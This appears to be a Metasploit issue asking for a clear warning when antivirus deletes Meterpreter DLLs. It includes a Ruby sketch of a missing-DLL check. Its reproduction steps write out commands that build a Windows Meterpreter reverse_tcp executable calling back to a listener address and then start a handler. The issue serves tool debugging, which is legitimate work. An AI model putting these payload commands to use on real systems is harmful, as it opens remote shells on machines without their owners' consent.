When Antivirus deletes the Meterpreter DLLs, there's no clear indication that something has gone wrong.
We could improve this by:
- Adding additional warning messages on msfconsole boot, potentially as part of the EICAR check on bootup
- Adding additional logic to capture the scenario of generating a staged payload which doesn't successfully open a shell because the required Meterpreter DLLs are missing
Generate payload:
```
use windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.159
generate -f exe -o shell.exe
```
Move the DLLs:
```
## Find where your DLLs are currently:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > bundle show metasploit-payloads
[*] exec: bundle show metasploit-payloads
/Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148

## Temporarily move them!
cd /opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/metasploit-payloads-2.0.148/data
sudo mv meterpreter/ removed_by_av_meterpreter/
```
Verifying the nil path in msfconsole:
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp
>> MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: false)
=> nil
```
Now trigger the payload on the Windows target.
Current behavior
The prompt does not indicate any failure has occurred:
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
```
Expected behavior
Expected behavior:
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[!] Meterpreter path metsrv.x86.dll not found. Ensure antivirus is not enabled, or reinstall Metasploit.
```
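A sketch of what the proposed handler-side check could look like, as an added example that is not Metasploit code. It assumes a simplified stand-in for `MetasploitPayloads.meterpreter_path` (resolving `name.binary_suffix` under `data/meterpreter/` and returning nil when the file is gone) and a hypothetical `REQUIRED_COMPONENTS` table; the fake gem data directory is constructed in a temp dir so it runs offline.

```ruby
require 'tmpdir'
require 'fileutils'

# Simplified stand-in for MetasploitPayloads.meterpreter_path (assumption: the
# gem resolves "#{name}.#{binary_suffix}" under data/meterpreter/). Only the
# nil-when-missing behaviour shown in the irb session above is mirrored here.
def meterpreter_path(data_dir, name, binary_suffix)
  candidate = File.join(data_dir, 'meterpreter', "#{name}.#{binary_suffix}")
  File.file?(candidate) ? candidate : nil
end

# Hypothetical table of the DLLs a staged Windows Meterpreter needs before a
# session can complete; keyed by [platform, arch] so other targets can be added.
REQUIRED_COMPONENTS = {
  %w[windows x64] => [%w[metsrv x64.dll], %w[ext_server_stdapi x64.dll]],
  %w[windows x86] => [%w[metsrv x86.dll], %w[ext_server_stdapi x86.dll]]
}.freeze

# Returns the warning lines to print right after "Payload Handler Started";
# an empty array means every required DLL resolved to a real file.
def missing_dll_warnings(data_dir, platform, arch)
  REQUIRED_COMPONENTS.fetch([platform, arch]).filter_map do |name, suffix|
    next if meterpreter_path(data_dir, name, suffix)

    "[!] Meterpreter path #{name}.#{suffix} not found. " \
      'Ensure antivirus is not enabled, or reinstall Metasploit.'
  end
end

# Constructed scenario: AV removed metsrv.x64.dll but left the stdapi extension,
# which is exactly the silent-failure case the issue describes.
def demo
  Dir.mktmpdir do |dir|
    FileUtils.mkdir_p(File.join(dir, 'meterpreter'))
    File.write(File.join(dir, 'meterpreter', 'ext_server_stdapi.x64.dll'), 'MZ')
    missing_dll_warnings(dir, 'windows', 'x64')
  end
end

if __FILE__ == $PROGRAM_NAME
  puts '[*] Payload Handler Started as Job 1'
  demo.each { |line| puts line }
end
```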
Motivation
Allow users to more clearly understand when their A/V is interrupting msfconsole usage
Debugging
Not sure where the code is being called from, but you should be able to put in a breakpoint and use `puts caller`, or `up` and `down` inside an interactive pry breakpoint, to work out what's what:
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp
>> MetasploitPayloads.method(:meterpreter_path)
=> #<Method: MetasploitPayloads.meterpreter_path(name, binary_suffix, debug: ...) /Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148/lib/metasploit-payloads.rb:40>
```